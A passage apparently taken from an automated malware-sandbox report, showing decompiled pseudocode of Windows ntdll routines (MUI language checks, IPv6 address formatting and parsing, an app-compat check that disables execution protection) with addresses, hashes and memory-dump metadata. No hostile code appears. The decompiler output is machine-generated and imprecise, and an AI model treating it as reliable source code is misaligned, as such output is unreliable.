								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0221718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E021F2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0220E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E021FE2A8(_v12,  &_v68, _v16);
							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0220E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E021FE2A8(_t322,  &_v68, _t269);
							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0221718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E021F2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0220E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E021FE2A8(_v12,  &_v68, _v16);
						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0220E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E021FE2A8(_t322,  &_v68, _t296);
						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x02218788
                                                0x02218788
                                                0x02218791
                                                0x02218794
                                                0x02218798
                                                0x0221879b
                                                0x0221879e
                                                0x022187a1
                                                0x022187a4
                                                0x022187a7
                                                0x022187aa
                                                0x022187af
                                                0x02261ad3
                                                0x02218b0a
                                                0x02218b0d
                                                0x02218b13
                                                0x02218b19
                                                0x02218b1f
                                                0x02218b25
                                                0x02218b2b
                                                0x02218b31
                                                0x02218b37
                                                0x02218b3d
                                                0x02218b46
                                                0x02218b46
                                                0x022187c6
                                                0x022187d0
                                                0x02261ae0
                                                0x02261ae6
                                                0x02261af8
                                                0x02261af8
                                                0x02261afd
                                                0x02261afe
                                                0x02261b01
                                                0x02261b06
                                                0x02261b06
                                                0x022187d6
                                                0x022187f2
                                                0x022187f7
                                                0x02218807
                                                0x0221880a
                                                0x0221880f
                                                0x02218810
                                                0x02218813
                                                0x02218818
                                                0x02218818
                                                0x0221882c
                                                0x02218831
                                                0x02218838
                                                0x02218908
                                                0x02218920
                                                0x022189f0
                                                0x02218a08
                                                0x02218af6
                                                0x02218af6
                                                0x02218af8
                                                0x02218afb
                                                0x02261beb
                                                0x02261beb
                                                0x02218b04
                                                0x02261bf8
                                                0x02261c0e
                                                0x02261c13
                                                0x02261c16
                                                0x02261c16
                                                0x02261bf8
                                                0x00000000
                                                0x02218b04
                                                0x02218a0e
                                                0x02218a11
                                                0x02218a14
                                                0x02218a15
                                                0x02218a18
                                                0x02218a22
                                                0x02218b59
                                                0x02218a28
                                                0x02218a3c
                                                0x02218a3c
                                                0x02218a42
                                                0x02261bb0
                                                0x02261b11
                                                0x02261b11
                                                0x00000000
                                                0x02218a48
                                                0x02218a51
                                                0x02218a5b
                                                0x02218a5e
                                                0x02218a61
                                                0x02218a69
                                                0x02218a69
                                                0x02218a6d
                                                0x00000000
                                                0x00000000
                                                0x02218a74
                                                0x02218a7c
                                                0x02218a7d
                                                0x02218a91
                                                0x02218a93
                                                0x02218a93
                                                0x02218a98
                                                0x02218a9b
                                                0x02218aa1
                                                0x02218aa1
                                                0x02218aa4
                                                0x02218aaa
                                                0x02218ab1
                                                0x02218ac5
                                                0x02218ac7
                                                0x02218ac7
                                                0x02218ac5
                                                0x02218ace
                                                0x02261bc9
                                                0x02261bce
                                                0x02261bd2
                                                0x02261bd2
                                                0x02218ad8
                                                0x02218aeb
                                                0x02218aeb
                                                0x02218af0
                                                0x02218af4
                                                0x00000000
                                                0x02218af4
                                                0x02218a42
                                                0x02218926
                                                0x02218929
                                                0x0221892c
                                                0x0221892d
                                                0x02218930
                                                0x02218935
                                                0x0221893a
                                                0x02218b51
                                                0x02218940
                                                0x02218954
                                                0x02218954
                                                0x0221895a
                                                0x02261b63
                                                0x00000000
                                                0x02218960
                                                0x02218969
                                                0x02218973
                                                0x02218976
                                                0x02218979
                                                0x0221897e
                                                0x02218981
                                                0x02218981
                                                0x02218986
                                                0x00000000
                                                0x00000000
                                                0x02261b6e
                                                0x02261b74
                                                0x02261b7b
                                                0x02261b8f
                                                0x02261b91
                                                0x02261b91
                                                0x02261b99
                                                0x02261b9c
                                                0x02261ba2
                                                0x02261ba2
                                                0x0221898c
                                                0x02218992
                                                0x02218999
                                                0x022189ad
                                                0x02261ba8
                                                0x02261ba8
                                                0x022189ad
                                                0x022189b6
                                                0x022189c8
                                                0x022189cd
                                                0x022189d0
                                                0x022189d0
                                                0x022189d6
                                                0x022189e8
                                                0x022189e8
                                                0x022189ed
                                                0x00000000
                                                0x022189ed
                                                0x0221895a
                                                0x0221883e
                                                0x02218841
                                                0x02218844
                                                0x02218845
                                                0x02218848
                                                0x0221884d
                                                0x02218852
                                                0x02218b49
                                                0x02218858
                                                0x0221886c
                                                0x0221886c
                                                0x02218872
                                                0x02261b0e
                                                0x00000000
                                                0x02218878
                                                0x02218881
                                                0x0221888b
                                                0x0221888e
                                                0x02218891
                                                0x02218896
                                                0x02218899
                                                0x02218899
                                                0x0221889e
                                                0x00000000
                                                0x00000000
                                                0x02261b21
                                                0x02261b27
                                                0x02261b2e
                                                0x02261b42
                                                0x02261b44
                                                0x02261b44
                                                0x02261b4c
                                                0x02261b4f
                                                0x02261b55
                                                0x02261b55
                                                0x022188a4
                                                0x022188aa
                                                0x022188b1
                                                0x022188c5
                                                0x02261b5b
                                                0x02261b5b
                                                0x022188c5
                                                0x022188ce
                                                0x022188e0
                                                0x022188e5
                                                0x022188e8
                                                0x022188e8
                                                0x022188ee
                                                0x02218900
                                                0x02218900
                                                0x02218905
                                                0x00000000
                                                0x02218905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 02218914
                                                • Kernel-MUI-Language-SKU, xrefs: 022189FC
                                                • WindowsExcludedProcs, xrefs: 022187C1
                                                • Kernel-MUI-Language-Allowed, xrefs: 02218827
                                                • Kernel-MUI-Number-Allowed, xrefs: 022187E6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                • Instruction ID: 081e2711cba9e3fd3ebc08b77671ba76b006db1fbd8195768709f8776e35835e
                                                • Opcode Fuzzy Hash: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                • Instruction Fuzzy Hash: 14F103B2D1020AEFDB51DFD8C984DEEB7F9BB18304F10446AE605A7224E734AA51DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 022313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E022313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x21f2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x21f9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02227707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02227707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02227707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02227707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x022313d5
                                                0x022313d9
                                                0x022313dc
                                                0x022313de
                                                0x022313e1
                                                0x022313e8
                                                0x022313ee
                                                0x0225e8fd
                                                0x00000000
                                                0x0225e921
                                                0x0225e921
                                                0x0225e928
                                                0x0225e982
                                                0x0225e98a
                                                0x00000000
                                                0x0225e99a
                                                0x0225e99e
                                                0x0225e9a3
                                                0x0225e9a8
                                                0x0225e9b9
                                                0x0225e978
                                                0x00000000
                                                0x0225e978
                                                0x0225e98a
                                                0x0225e92a
                                                0x0225e931
                                                0x0225e944
                                                0x0225e944
                                                0x0225e950
                                                0x0225e954
                                                0x0225e959
                                                0x0225e95e
                                                0x0225e963
                                                0x0225e970
                                                0x00000000
                                                0x0225e975
                                                0x0225e93b
                                                0x0225e980
                                                0x00000000
                                                0x0225e980
                                                0x0225e942
                                                0x0225e94b
                                                0x00000000
                                                0x0225e94b
                                                0x00000000
                                                0x0225e942
                                                0x022313f4
                                                0x022313f4
                                                0x022313f9
                                                0x022313fc
                                                0x022313ff
                                                0x02231406
                                                0x0225e9cc
                                                0x0225e9d2
                                                0x0225e9d2
                                                0x0225e9cc
                                                0x0223140c
                                                0x02231411
                                                0x02231431
                                                0x0223143a
                                                0x0223143c
                                                0x0223143f
                                                0x0223143f
                                                0x02231442
                                                0x02231447
                                                0x022314a8
                                                0x022314ac
                                                0x0225e9e2
                                                0x0225e9e7
                                                0x0225e9ec
                                                0x0225ea05
                                                0x0225ea05
                                                0x00000000
                                                0x02231449
                                                0x00000000
                                                0x02231449
                                                0x0223144c
                                                0x02231459
                                                0x02231462
                                                0x02231469
                                                0x0223146a
                                                0x02231470
                                                0x02231473
                                                0x02231476
                                                0x02231476
                                                0x02231490
                                                0x02231495
                                                0x0223138e
                                                0x02231390
                                                0x02231397
                                                0x02231398
                                                0x02231399
                                                0x022313a1
                                                0x022313a4
                                                0x022313a4
                                                0x02231498
                                                0x0223149c
                                                0x0223149f
                                                0x022314a2
                                                0x00000000
                                                0x00000000
                                                0x022314a4
                                                0x00000000
                                                0x022314a4
                                                0x02231413
                                                0x02231415
                                                0x02231416
                                                0x02231419
                                                0x0223141c
                                                0x02231422
                                                0x022313b7
                                                0x022313bc
                                                0x022313bf
                                                0x022313bf
                                                0x022313c2
                                                0x02231424
                                                0x02231424
                                                0x02231424
                                                0x02231427
                                                0x0223142b
                                                0x0223142c
                                                0x0223142c
                                                0x0223142c
                                                0x00000000
                                                0x0223141c
                                                0x02231411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                • Instruction ID: 631dd630a75fab7537ac6a9a10135f52846147483b819f0065db32a4f8a182a5
                                                • Opcode Fuzzy Hash: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                • Instruction Fuzzy Hash: 546158B1D24756AACF35DFD9C8809BEBBB5EF84310714C02DEAEA47548D371A650CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02227EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E02227EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x22d2088; // 0x774c099c
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02227F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02243F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E021FDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x22d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02243F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02200D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02243F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02208375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02243F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0226E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02243F92();
					_t38 = 1;
					L2:
					return E021FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x02227f08
                                                0x02227f0f
                                                0x02227f12
                                                0x02227f1b
                                                0x02227f31
                                                0x02243ead
                                                0x02243eb4
                                                0x00000000
                                                0x00000000
                                                0x02243eba
                                                0x02243ecd
                                                0x02243ed2
                                                0x02243ee1
                                                0x02243ee7
                                                0x02243eec
                                                0x02243f12
                                                0x02243f18
                                                0x02243f1a
                                                0x00000000
                                                0x00000000
                                                0x02243f20
                                                0x02243f26
                                                0x02243f28
                                                0x00000000
                                                0x00000000
                                                0x02243f2e
                                                0x02243f30
                                                0x00000000
                                                0x00000000
                                                0x02243f3a
                                                0x02243f3b
                                                0x02243f53
                                                0x02243f64
                                                0x02243f69
                                                0x02243f6c
                                                0x02243f6d
                                                0x02243f6f
                                                0x0224e304
                                                0x0224e30f
                                                0x0224e315
                                                0x0224e31e
                                                0x0224e321
                                                0x0224e327
                                                0x0224e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0224e32f
                                                0x0224e32f
                                                0x0224e337
                                                0x0224e33a
                                                0x0224e33b
                                                0x0224e33d
                                                0x0224e33f
                                                0x0224e341
                                                0x0224e341
                                                0x0224e34e
                                                0x0224e353
                                                0x0224e358
                                                0x0224e35d
                                                0x0224e35f
                                                0x00000000
                                                0x00000000
                                                0x0224e365
                                                0x0224e365
                                                0x0224e368
                                                0x0224e36e
                                                0x00000000
                                                0x00000000
                                                0x0224e374
                                                0x0224e32f
                                                0x02243f75
                                                0x02243f7a
                                                0x02243f7c
                                                0x02243f7e
                                                0x02243f86
                                                0x02227f39
                                                0x02227f47
                                                0x02227f47
                                                0x02227f37
                                                0x02227f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02243F12
                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02243EC4
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02243F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02243F4A
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0224E345
                                                • Execute=1, xrefs: 02243F5E
                                                • ExecuteOptions, xrefs: 02243F04
                                                • X&`, xrefs: 02227F1E
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0224E2FB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$X&`
                                                • API String ID: 3901378454-1396930024
                                                • Opcode ID: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                • Instruction ID: b1f03886d129f77af69f5530b3573bf95e5dc52879242d03fd2c5bbac30f6d1a
                                                • Opcode Fuzzy Hash: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                • Instruction Fuzzy Hash: 9641EB3169431D7AEF20DAD4DCC9FEAB3BDAF14704F0005A9E605E6085EF719A458F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02230B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02230B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02208980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E021FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02230CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02230CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E022306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E022306BA(_t135, _t178) == 0 || E02230A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02230CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02230CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
